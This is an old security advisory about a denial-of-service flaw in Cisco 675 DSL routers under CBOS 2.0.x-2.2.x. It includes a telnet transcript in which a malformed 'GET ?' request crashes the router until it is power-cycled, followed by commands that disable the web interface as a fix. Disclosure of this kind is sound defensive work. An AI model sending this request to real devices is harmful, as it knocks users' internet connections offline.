COMMAND
Cisco
SYSTEMS AFFECTED
Cisco 675 DSL Router
PROBLEM
CDI found following. The Cisco 675 DSL routers with the Web
Administration Interface enabled can be crashed (hard) using a
simple GET request. CBOS versions 2.0.x through 2.2.x have been
found to be vulnerable. The new CBOS 2.3.x has not been tested,
but there are no notes in the 2.3.x changelogs to indicate that
they've fixed this problem. Effected 675s were configured in PPP
mode. The 'Web Administration Interface' is enabled by default
in CBOS revisions 2.0.x and 2.2.x.
The Cisco 67x series of DSL routers are produced and distributed
for specific telcos to offer to their clients and as such, the
installation base is quite large. (To hazzard a guess, if just
20% of all Qwest DSL users are using Cisco 675s, the installation
base would exceed 25,000) The DSL adapters in this series
include: Cisco 673, Cisco 675, Cisco 675e, Cisco 676, Cisco 677,
and Cisco 678. This advisory applies specifically to the 675 but
other adapters in this series may have similar problems and
should be tested for vulnerability to this type of attack. The
CBOS codebase is an aquired OS and as such, has no relationship
at all to the main Cisco IOS codebase.
Exploit:
telnet vic.tim.ip.addr 80
Connected to vic.tim.ip.addr.
Escape character is '^]'.
GET / HTTP/1.0
HTTP/1.0 401 Unauthorized
Content-type: text/html
WWW-Authenticate: Basic realm="CISCO_WEB"
<CENTER><h1>Unauthorized Access 401</h1></center>
Connection closed by foreign host.
Now kill it:
telnet vic.tim.ip.addr 80
Trying vic.tim.ip.addr...
Connected to vic.tim.ip.addr.
Escape character is '^]'.
GET ? [LF][LF]
Your telnet session dies here, and so does the router.
Dead as a post:
ping -c5 vic.tim.ip.addr
PING vic.tim.ip.addr (vic.tim.ip.addr): 56 data bytes
5 packets transmitted, 0 packets received, 100% packet loss
The Cisco never recovers - it's hosed until the router is
power-cycled. A simple 'GET ? \n\n' is all it takes to kill the
router. In case you're wondering, CDI had meant to enter 'GET
/', but his finger slipped on the shift key. Neat eh?
This exploit works on a Cisco 677 running CBOS 2.2.0.002. It does
not work when you specify the web server to only accept
connections from certain IP's. You could spoof them, but have fun
guessing the IP.
SOLUTION
Disable the Web Based Administration Interface in your 675 until a
patch or CBOS revision is made available. Web Server Disable
commands (2.0.x or better):
(CBOS 'enable' mode) cbos# set web disabled
cbos# write
cbos# reboot
For solution see:
http://oliver.efri.hr/~crv/security/bugs/Others/cisco43.html